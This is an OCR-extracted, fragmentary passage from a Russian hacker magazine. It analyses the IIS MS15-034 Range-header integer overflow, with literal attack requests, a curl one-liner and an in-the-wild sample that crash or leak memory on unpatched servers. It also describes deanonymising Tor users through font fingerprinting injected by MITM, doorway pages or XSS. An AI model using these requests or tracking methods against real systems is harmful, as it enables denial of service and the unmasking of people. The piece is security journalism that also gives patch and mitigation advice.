книги хакеры / журнал хакер / 197_Optimized

Архитектура IIS

Первая позиция — 0xFFFFFFFFFFFFFFFF

Длина — 0xFFFFFFFFFFFFFFFF

Первая позиция >= размер запрашиваемой страницы

Последняя позиция >= размер запрашиваемой страницы

Второе целочисленное переполнение обнаруживается в последней функции. Она служит для получения последней позиции Range (см. скриншот).

В этом случае начальная позиция равна 284, а длина — 0xFFFFFFFFFFFFFEE4, то есть получается переполнение. В итоге последняя позиция становится равна нулю и обходит условие для своего исправления.

Если в дальнейшем мы получим такой запрос многократно, то ответ будет закеширован. Отправка ответа из кеша, в свою очередь, вызовет функцию UxpTpDirectTransmit(), которая приведет к вычислению размера ответа. Упрощенный код приведен на скриншоте.

Разберем его, используя наши значения:

было как можно больше. То есть значение Range Start Position должно лежать в диапазоне от HTTP Head Length + 1 до размера запрашиваемой страницы. В этом случае оно не вызовет переполнения и HTTP Content Length будет огромным и позволит провести DoS-атаку.

После того как HTTP-пакет с ответом будет собран, http.sys перенаправит информацию о нем на стек протокола драйвера. Функция TcpSegmentTcbSend() из tcpip.sys переместит каждую часть содержимого пакета. И опять целочисленное переполнение (см. скриншот).

Переполнение находится на строке 15 упомянутого выше скриншота. В нашем случае значение HTTP Response Length равно 0xFFFFFFFF. Virtual address инициализирует пе-

Взлом

ременную с адресом в ядре (>=0x80000000). Так как значение HTTP Response Length равно большому числу, то это зациклится на много раз. Через некоторое количество циклов virtual address будет содержать небольшое значение после переполнения. Во время цикла эта переменная будет использоваться для создания partial memory descriptor list (MDL) (bit.ly/1zODcs4). И так как диапазон не является подмножеством основного, это приведет к появлению долгожданного BSOD.

Для проведения атаки с целью получить информацию нужно будет сделать следующее.

GET /iisstart.htm HTTP/1.1\r\nHost: aaaaa\r\nRange: bytes=3-18446744073709551615, 1-600"+ "\r\n\r\n"

Вэтом случае мы используем несколько диапазонов (Range):

•Range1: 3–18 446 744 073 709 551 615;

•Range2: 1–600.

Вфункции UlpParseRange() новый код будет выглядеть так:

Range1 Length = 0xFFFFFFFFFFFFFFFF - 0x3 + 1 = 0xFFFFFFFFFFFFFFFD

Range2 Length = 600 -1 + 1 = 600

После обработки запроса HTTP будет вызвана функция UlAdjustRangesToContentSize().Range1вызоветпереполнение(3+0xFFFFFFFFFFFFFFFD => 0) и пройдет проверку на исправление, даже если оно «неправильное». Range2, в свою очередь, и так нормален и не требует обработки.

Так как после некоторого количества запросов ответ кешируется, будет вызвана функция UxpTpDirectTransmit().

Range Count = 2

Range1 Length = 0xFFFFFFFFFFFFFFFD

Range2 Length = 600

Http Head Length= 0x127 // HTTP head content, Скриншот 1

Range1 Boundary and Range1 Info length = 0x7a

Range2 Boundary and Range2 Info length = 0x69

Range Tail Boundary Length = 0x32; // Скриншот 3

Поскольку используется несколько переменных Range, будет обязательный тег (boundary) и соответствующая информация (Content-Type, Content-Range) перед каждым содержимым Range (скриншот 2).

Из скриншота с упрощенным HTTP-кодом мы могли увидеть, что:

HTTP Response Length = HTTP Head Length + Range Boundary and Range

Info length + Range1 Length + Range Boundary Range Info length + Range2

Length = 0x127+7a+0xFFFFFFFD+0x69+0x258+0x32 => 0x491

EXPLOIT

Пример атакующего запроса (его как раз можно использовать для проверки системы на уязвимость):

GET / HTTP/1.1

Host: site.com

Range: bytes=0-18446744073709551615

Для атаки ты можешь воспользоваться следующими готовыми реализациями:

•на старом добром С (bit.ly/1KvJDRc);

•на Python (bit.ly/1cjO8mC). Или вручную:

curl -v SERVER_IP -H "Host: anything" -H

"Range: bytes=0-18446744073709551615"

Некоторые исследователи решили провести массовое сканирование, как в случае с уязвимостью в bash и других столь же серьезных. Надеюсь, интернет не сильно от этого пострадал :).

После обнародования деталей появились ITW-атаки с использованием этой уязвимости. Ниже представлен пример одной из них (спасибо ребятам из ESET):

GET /%7Bwelcome.png HTTP/1.1

User-Agent: Wget/1.13.4 (linux-gnu)

Accept: */*

Host: [server-ip]

Connection: Keep-Alive

Range: bytes=18-18446744073709551615

TARGETS

Windows-системы без патча MS15-034.

SOLUTION

Есть исправление от производителя.

Взлом

Кто больше всего любит даркнеты? Кто трепетнее всех относится к Tor’у? Конечно же, мы, хакеры. Поэтому мы всегда очень расстраиваемся, когда в наших игровых площадках находятся баги, могущие привести к нашей полной деанонимизации. И ведь нам же, со слезами на глазах, приходится рассказывать о них широкой общественности! А что делать? Плачем, но пишем.

ШаткаядорожкаШелковогоПути

«Идеалист» — так средства массовой информации вежливо называют парня, который нарвался на пожизненное заключение, оказавшись виновным по всем пунктам обвинений. Распространение наркотиков, продажа запрещенных веществ, отмывание денег, взлом компьютерных систем — теперь все это часть биографии Уильяма Росса Ульбрихта, который, по мнению следствия, также известен как Dread Pirate Roberts.

Silk Road (2011–2013) — торговая площадка в даркнете Tor с оборотом более 15 миллионов «мертвых президентов», которая в свое время была оплотом любителей незаконного товара. «Шелковый путь» собрал вокруг себя соответствующую целевую аудиторию, принес Россу более 200 миллионов долларов и стал для него прямой дорогой за решетку.

В2013 году ФБР удалось закрыть площадку, а Росса, которого считают ее владельцем, и ее модератора Питера Нэша отправили за решетку. Однако технические подробности поимки основателя криминальной торговой площадки все еще вызывают ряд вопросов.

Вматериалах уголовного дела ФБР выставляет подсудимого новичком, который не соблюдал элементарные правила анонимизации своей деятельности: оставлял адрес своей почты, имя и фамилию в социальных сетях и прикреплял сомнительные описания в своих профилях. Кроме того, парня задержали в кафе, где со своего ноутбука он был залогинен на площадке Silk Road под учетной записью ее администратора. Звучит не очень убедительно для технического специалиста, заинтересованного в подробностях о деанонимизации

вдаркнете.

Другим громким инцидентом, вызывающим еще больше вопросов, стало закрытие более 400 onion-ресурсов с разнообразными запрещенными товарами и услугами, среди которых оказался Silk Road 2.0 — последователь прогремевшей на весь даркнет площадки.

Это событие всколыхнуло не только андеграунд, оно вызвало резонанс и в широкой общественности, ведь под сомнение встала сама концепция луковой сети. Теоретически, когда резидент даркнета посещает onion-ресурс, в силу устройства Tor никто не может определить физическое местонахождение ни самого резидента, ни веб-сервера, на котором крутится данное веб-приложение. И в этом заставили усомниться органы правопорядка, которые без объяснения технических деталей сумели провести ряд громких арестов. Попробуем встать

Утекшие документы NSA

Если у тебя появилось желание ознакомиться с утекшими документами NSA, в которых имеется много уже устаревшей информации о вариантах деанонимизации и фингерпринтинга Tor-пользователей, то рекомендуем пару ссылок:

https://www.schneier.com/blog/archives/2013/10/ how_the_nsa_att.html,

www.theguardian.com/world/interactive/2013/ oct/04/egotistical-giraffe-nsa-tor-document.

Взлом

возможность деанонимизировать любого Tor-пользователя в любом промежутке времени. Именно по этой причине данные исследования не представляют практической ценности для исследователей-одиночек, не обладающих огромным пулом вычислительных ресурсов. И именно по этой причине мы пойдем другим путем и рассмотрим методы анализа активности Tor-пользователя, интересные с практической точки зрения.

Пассивнаясистемамониторинга

Все эти факторы влияют на рендеринг шрифтов и, как результат, позволяют при помощи JavaScript-функции measu­ reText() получить их уникальный размер.

После того как эта проблема, которая также касается пользователей Tor Browser, стала известна комьюнити, был создан соответствующий тикет. Однако разработчики Tor Browser не спешат закрывать данный недостаток конфигурации, сославшись на неэффективность блеклистинга подобных функций.

Данную особенность атакующий может использовать для фингерпринтинга Tor-пользователей, и, как продемон-

Tor: полная деанонимизация

стрирует реализация активной системы сбора данных, собранная им информация может использоваться для последующей деанонимизации.

Яузнаютебяпошрифтам

Для доказательства этой концепции мы подготовили следующий тестовый стенд: веб-приложение (мой блог, размещенный на отдельном домене), которое имеет определенную целевую аудиторию (специалисты по ИБ и IT-специалисты). Согласно статистике моей сети доставки контента (Content Delivery Network, CDN), за одну неделю главную страницу моего блога посещает 128 Tor-пользователей (моя CDN вежливо помечает посетителей из даркнета как угрозу и просит ввести капчу прежде, чем отдать контент главной страницы).

Соответственно, на данную страницу мы внедрили JavaScript, который использует функцию measureText() для измерения отрендеренных шрифтов в браузере посетителя вебстраницы.

Данный скрипт осуществляет фингерпринт браузера пользователя на основе результатов рендеринга шрифта. Ширина получившегося шрифта представляет собой значение с плавающей точкой. Скрипт хеширует данное значение и любезно

Внедренный в главную страницу JavaScript, который осуществляет fingerprint браузера

Фрагмент лога вебсервера, в котором засветился фингерпринт Tor Browser’а

Объекты, которые могут фингерпринтить Tor-пользователя

Процесс денонимизации Tor-юзера

Чтобы обезопасить себя от подобной слежки, нужно задать себе вопрос: «Так ли мне необходим JavaScript в даркнете?» И сделать то, чего до сих пор не сделали разработчики Tor Browser, — отключить JS

отправляет результат в виде POST-запроса веб-серверу, который, в свою очередь, сохраняет этот запрос в своих логах.

Выходимвполе

Каким образом данная концепция может быть использована в реальных условиях? Описанный выше JS-код может быть установлен на нескольких участниках информационного обмена в даркнете:

•Exit-node. Реализация MITM-атаки, в ходе которой JS-код внедряется во все веб-страницы, которые посещает во внешней сети резидент даркнета.

•Внутренние onion-ресурсы и внешние веб-приложения, контролируемые злоумышленником. Например, атакующий поднимает свой дорвей — специально подготовленную веб-страницу под конкретную целевую аудиторию — и устраивает фингерпринт всех посетителей.

•Уязвимые к XSS (предпочтительно к «хранимым», но не обязательно) внутренние и внешние веб-приложения.

Последний пункт особенно интересен. Просканировав на веб-уязвимости примерно 100 onion-ресурсов (которые оказались в логах пассивной системы мониторинга) и отсеяв false positive, мы выяснили, что примерно 30% всех проанализированных ресурсов даркнета подвержены атакам «межсайтового скриптинга».

Все это означает, что атакующий теперь может не ограничиваться поднятием фермы выходных узлов, для того чтобы деанонимизировать пользователя. Теперь злодей может скомпрометировать веб-приложения и поднять дорвеи, разместить там JS-код и составлять базу данных уникальных фингерпринтов. Например, он может выяснить, что пользователь с уникальным фингерпринтом c2c91d5b3c4fecd9109afe0e был замечен на сайтах sdfsdfsdfdrugs.onion (основная тематика — наркотики), gunsdfsdf.onion (основная тематика — оружие), linkedin.com/vasya и так далее. Результат: конкретная личность и ее психологический портрет.

Каксебяобезопасить?

Описанная техника фингерпринтинга позволяет выделять конкретные браузеры, которые также используются для серфинга исключительно onion-ресурсов и не ходят во внешний «веб». Чтобы обезопасить себя от подобной слежки, нужно задать себе вопрос: «Так ли мне необходим JavaScript в даркнете?» И сделать то, чего до сих пор не сделали разработчики Tor Browser, — отключить JS.

Conference

2015